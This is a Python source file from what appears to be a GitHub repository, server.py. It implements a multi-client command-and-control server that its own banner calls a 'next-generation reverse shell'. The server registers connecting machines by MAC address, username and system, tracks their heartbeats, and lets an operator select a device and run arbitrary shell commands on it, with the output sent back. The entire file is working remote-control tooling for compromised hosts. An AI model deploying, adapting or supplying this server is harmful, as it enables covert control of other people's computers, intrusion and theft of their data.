-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathserver.py
More file actions
305 lines (266 loc) · 11.2 KB
/
server.py
File metadata and controls
305 lines (266 loc) · 11.2 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
import socket
import threading
import json
import time
from datetime import datetime
from queue import Queue, Empty
class Server:
def __init__(self, host='0.0.0.0', port=9999):
self.host = host
self.port = port
self.clients = {}
self.server_socket = None
self.monitoring = True
self.heartbeat_timeout = 15
def start_server(self):
self.server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.server_socket.bind((self.host, self.port))
self.server_socket.listen(5)
print(f"服务器启动,监听 {self.host}:{self.port}")
monitor_thread = threading.Thread(target=self.monitor_clients, daemon=True)
monitor_thread.start()
try:
while True:
client_socket, address = self.server_socket.accept()
threading.Thread(target=self.handle_client, args=(client_socket, address), daemon=True).start()
except KeyboardInterrupt:
print("服务器关闭")
finally:
self.monitoring = False
try:
self.server_socket.close()
except:
pass
def handle_client(self, client_socket, address):
mac_address = None
try:
buffer = b""
while b"\n" not in buffer:
data = client_socket.recv(1024)
if not data:
return
buffer += data
line, remainder = buffer.split(b"\n", 1)
client_info = json.loads(line.decode('utf-8'))
mac_address = client_info.get('mac')
username = client_info.get('username')
system_info = client_info.get('system')
print(f"设备 {mac_address} 已连接,用户: {username}")
self.clients[mac_address] = {
'socket': client_socket,
'lock': threading.Lock(),
'info': client_info,
'buffer': remainder,
'queue': Queue(maxsize=200),
'ip': address[0],
'port': address[1],
'username': username,
'system': system_info,
'connected_at': datetime.now().isoformat(),
'last_seen': datetime.now().isoformat()
}
threading.Thread(target=self.client_reader, args=(mac_address,), daemon=True).start()
except Exception as e:
print(f"处理客户端连接时出错: {e}")
if mac_address:
self.cleanup_disconnected_client(mac_address)
try:
client_socket.close()
except:
pass
# 持续读取客户端消息
def client_reader(self, mac_address):
if mac_address not in self.clients:
return
client_data = self.clients[mac_address]
sock = client_data['socket']
buffer = client_data['buffer']
try:
while True:
if b"\n" not in buffer:
try:
sock.settimeout(10.0)
data = sock.recv(4096)
if not data:
break
buffer += data
except socket.timeout:
continue
except Exception:
break
while b"\n" in buffer:
line, buffer = buffer.split(b"\n", 1)
if not line.strip():
continue
try:
message = json.loads(line.decode('utf-8'))
except json.JSONDecodeError:
continue
client_data['last_seen'] = datetime.now().isoformat()
if message.get('type') == 'heartbeat':
continue # 心跳消息不入队(血泪史)
try:
client_data['queue'].put_nowait(message)
except:
try:
_ = client_data['queue'].get_nowait()
except Empty:
pass
try:
client_data['queue'].put_nowait(message)
except:
pass
client_data['buffer'] = buffer
finally:
self.cleanup_disconnected_client(mac_address)
def monitor_clients(self):
while self.monitoring:
try:
now = time.time()
for mac, client_data in list(self.clients.items()):
try:
last = datetime.fromisoformat(client_data['last_seen']).timestamp()
except Exception:
last = now
if now - last > self.heartbeat_timeout:
print(f"客户端 {mac} 超时离线")
self.cleanup_disconnected_client(mac)
time.sleep(5)
except Exception as e:
print(f"监控线程异常: {e}")
time.sleep(1)
def list_devices(self):
print("\n在线设备:")
if not self.clients:
print("暂无设备在线")
return
for mac, client_data in self.clients.items():
print(f" MAC: {mac}")
print(f" IP: {client_data['ip']}")
print(f" 用户: {client_data['username']}")
print(f" 系统: {client_data['system']}")
print(f" 首次连接: {client_data['connected_at']}")
print(f" 最后心跳: {client_data['last_seen']}")
print("-" * 30)
# 移除超时客户端
def cleanup_disconnected_client(self, mac_address):
if mac_address in self.clients:
try:
self.clients[mac_address]['socket'].close()
except:
pass
del self.clients[mac_address]
print(f"已移除失效的客户端: {mac_address}")
# 向指定客户端发送消息
def send_message_to_client(self, mac_address, message):
if mac_address not in self.clients:
print(f"客户端 {mac_address} 不存在或已断开")
return False
try:
sock = self.clients[mac_address]['socket']
message_str = json.dumps(message, ensure_ascii=False) + "\n"
sock.sendall(message_str.encode("utf-8"))
return True
except Exception as e:
print(f"发送消息到客户端时出错: {e}")
self.cleanup_disconnected_client(mac_address)
return False
# 从客户端获取消息
def receive_message_from_client(self, mac_address, timeout=30):
if mac_address not in self.clients:
return None
q: Queue = self.clients[mac_address]['queue']
try:
message = q.get(timeout=timeout)
return message
except Empty:
return None
# 向客户端发送命令并等待客户端回显
def execute_command_on_client(self, mac_address, command_str):
if mac_address not in self.clients:
return {'status': 'error', 'message': f'设备 {mac_address} 不在线'}
client_data = self.clients[mac_address]
lock = client_data['lock']
try:
with lock:
command = {'type': 'execute', 'command': command_str}
if not self.send_message_to_client(mac_address, command):
return {'status': 'error', 'message': '发送命令失败'}
result = self.receive_message_from_client(mac_address, timeout=30)
if result:
client_data['last_seen'] = datetime.now().isoformat()
return result
else:
return {'status': 'error', 'message': '未收到客户端响应或客户端已断开'}
except Exception as e:
return {'status': 'error', 'message': f'执行命令时出错: {str(e)}'}
def server_cli(server: Server):
current_client = None
print("下一代反向shell()")
print("可用命令:")
print(" list - 列出所有设备")
print(" use <mac> - 选择要控制的设备") # MySQL风格
print(" bye - 退出当前设备会话")
print(" quit - 退出服务器")
while True:
try:
if current_client is None:
command = input("\n> ").strip().split()
if not command:
continue
if command[0] == 'list':
server.list_devices()
elif command[0] == 'use' and len(command) > 1:
mac = command[1]
if mac in server.clients:
current_client = mac
info = server.clients[mac]
print(f"已连接到设备 {mac} ({info['username']}@{info['ip']})")
print("输入 'bye' 返回主菜单")
else:
print(f"设备 {mac} 不在线")
elif command[0] == 'quit':
print("正在关闭服务器...")
break
else:
print("未知命令")
else:
user_input = input(f"{current_client}> ").strip()
if not user_input:
continue
if user_input.lower() == 'bye':
current_client = None
print("已返回主菜单")
continue
# 执行客户端命令并获取回显(在某些特殊情况下会失败,比如vim这种交互式场景,大概率想支持的话需要虚拟tty之类的)
result = server.execute_command_on_client(current_client, user_input)
if result.get('status') == 'success':
stdout = result.get('stdout', '')
stderr = result.get('stderr', '')
returncode = result.get('returncode', 0)
current_dir = result.get('current_dir', '')
if current_dir:
print(f"当前目录: {current_dir}")
if stdout:
print(stdout, end='' if stdout.endswith('\n') else '\n')
if stderr:
print(stderr, end='' if stderr.endswith('\n') else '\n')
if returncode != 0:
print(f"(返回码: {returncode})")
else:
print(f"错误: {result.get('message', '未知错误')}")
except KeyboardInterrupt:
if current_client:
current_client = None
print("\n已返回主菜单")
else:
print("\n正在关闭服务器...")
break
except Exception as e:
print(f"命令执行出错: {e}")
if __name__ == "__main__":
server = Server()
threading.Thread(target=server.start_server, daemon=True).start()
time.sleep(1)
server_cli(server)